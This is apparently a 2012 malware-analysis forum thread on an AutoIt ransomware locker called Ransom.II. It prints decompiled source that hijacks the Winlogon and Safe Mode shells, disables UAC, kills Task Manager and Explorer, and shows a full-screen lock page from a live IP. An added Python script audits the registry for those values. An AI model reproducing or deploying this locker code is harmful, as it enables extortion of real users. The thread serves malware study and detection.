A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #16586  by thisisu
 Tue Nov 13, 2012 1:02 am
Win32:Virut wrote: Ransom.II

MD5: F74E910C368717E9ACEF3A1B9A1A9F03

Screenshots: https://www.botnets.fr/index.php/Ransom.II
Parts of decompiled Autoit script. / Highlights?
Code:
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut3E.tmp

$UNDERGROUND = "brasilia"
$SWISS = "germany"

ProcessClose("iexplore.exe")
ProcessClose("firefox.exe")
$URL = "95.163.104.88/spielberg/start.php"
If @OSVersion = "WIN_7" Or @OSVersion = "WIN_VISTA" Then
	If @OSArch = "X64" Then
		RegWrite("HKEY_LOCAL_MACHINE64\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	Else
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	EndIf
EndIf
$ASHELL = RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell")
If $ASHELL <> @ScriptFullPath Then
	If @OSVersion <> "WIN_7" Or @OSVersion = "WIN_VISTA" Then
		RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", @ScriptFullPath)
	EndIf
	RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot", "AlternateShell", "REG_SZ", @ScriptFullPath)
	RegWrite("HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions", "NoBrowserContextMenu", "REG_DWORD", "1")
	RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoViewContextMenu", "REG_DWORD", "1")
	RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "REG_DWORD", "0")
EndIf
$SHELL = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell")
If $SHELL <> @ScriptFullPath Then
	FileCreateShortcut(@ScriptFullPath, @StartupDir & "\" & @ScriptName & ".lnk")
EndIf
$OIE = ObjCreate("Shell.Explorer.2")
$HGUI = GUICreate("", @DesktopWidth, @DesktopHeight, 0, 0, $WS_POPUP + $WS_EX_TOOLWINDOW, $WS_EX_LAYERED + $WS_EX_TOPMOST + $WS_EX_TOOLWINDOW)
$GUIACTIVEX = GUICtrlCreateObj($OIE, 0, 0, @DesktopWidth, @DesktopHeight)
GUISetBkColor(1, $HGUI)
GUISetState()
$OIE.navigate($URL)
_WinAPI_SetLayeredWindowAttributes($HGUI, 1, 255, 3)
Local $TIMER, $DIFF
$TIMER = TimerInit()
While 1
	$DIFF = TimerDiff($TIMER)
	If $DIFF > 150 Then
		If ProcessExists("taskmgr.exe") Then
			ProcessClose("taskmgr.exe")
		EndIf
		If ProcessExists("explorer.exe") Then
			Run(@ComSpec & " /c " & "taskkill /f /im explorer.exe", "", @SW_HIDE)
		EndIf
		$DIFF = 0
		$TIMER = TimerInit()
	EndIf
	WinSetOnTop($HGUI, "", 1)
	WinActivate($HGUI)
WEnd
Full decompile in attachment.

You can add this IP: 95.163.104.88 to your page Kafeine :)
Attachments
pass: infected
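As an added defender-side example (not from the post or the sample), the Python check below audits a registry snapshot for the values the decompiled script overwrites: Winlogon Shell, SafeBoot AlternateShell, EnableLUA and the two context-menu policies. The snapshot format, the `HKLM` short-form key paths and the dropped-file path are assumptions; the infected snapshot is constructed to mirror the RegWrite calls above.

```python
# Added example (not from the post): audit a registry snapshot for the
# persistence and lockout values the decompiled AutoIt script writes.
# Assumed format: {(key_path, value_name): data}, e.g. from a .reg export.

WINLOGON = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
SAFEBOOT = r"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot"
POL_SYSTEM = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System"
POL_EXPLORER = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
IE_RESTRICT = r"HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions"

# Values the script overwrites, paired with their stock Windows defaults.
EXPECTED_DEFAULTS = {
    (WINLOGON, "Shell"): "explorer.exe",
    (SAFEBOOT, "AlternateShell"): "cmd.exe",
    (POL_SYSTEM, "EnableLUA"): 1,
}
# Policies the script sets to 1; normally absent, which behaves like 0.
LOCKOUT_POLICIES = [
    (IE_RESTRICT, "NoBrowserContextMenu"),
    (POL_EXPLORER, "NoViewContextMenu"),
]

def audit_registry(snapshot):
    """Return (key, value_name, observed, expected) findings; a missing
    value counts as its default, so a clean snapshot yields []."""
    findings = []
    for (key, name), expected in EXPECTED_DEFAULTS.items():
        observed = snapshot.get((key, name), expected)
        if isinstance(expected, str):
            # Any replacement of the normal or Safe Mode shell is a finding.
            if observed.strip().lower() != expected:
                findings.append((key, name, observed, expected))
        elif observed != expected:
            findings.append((key, name, observed, expected))
    for key, name in LOCKOUT_POLICIES:
        if snapshot.get((key, name), 0) == 1:
            findings.append((key, name, 1, "absent or 0"))
    return findings

# Constructed snapshot mirroring the script's RegWrite calls; the path is a
# placeholder for @ScriptFullPath, not the sample's real drop location.
DROPPED = r"C:\Users\user\AppData\Local\Temp\PLACEHOLDER.exe"
INFECTED_SNAPSHOT = {
    (WINLOGON, "Shell"): DROPPED,
    (SAFEBOOT, "AlternateShell"): DROPPED,
    (POL_SYSTEM, "EnableLUA"): 0,
    (IE_RESTRICT, "NoBrowserContextMenu"): 1,
    (POL_EXPLORER, "NoViewContextMenu"): 1,
}
```

Calling `audit_registry(INFECTED_SNAPSHOT)` returns five findings, each carrying the stock default to restore; the Startup-folder .lnk fallback the script creates is a file-system check and is not covered here.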
 #16587  by thisisu
 Tue Nov 13, 2012 1:35 am
Win32:Virut wrote: Ransom.II

MD5: 82B192B07B32D0E77B1F2B21F17283E6

https://www.virustotal.com/file/edd206f ... /analysis/
Lots of interesting code in this one IMO. I just picked a small amount so it doesn't lag the thread.
Code:
00049AAC -> CompiledPathName: C:\DOKUME~1\Admin\LOKALE~1\Temp\aut7B.tmp

If FileExists(@AppDataDir & "1.exe") Then
	$HAFTBEFEHLAAT = "haftbefehlaat"
	$URL = "95.163.104.87/aff14/start.php"
Full decompile in attachment.
Attachments
pass: infected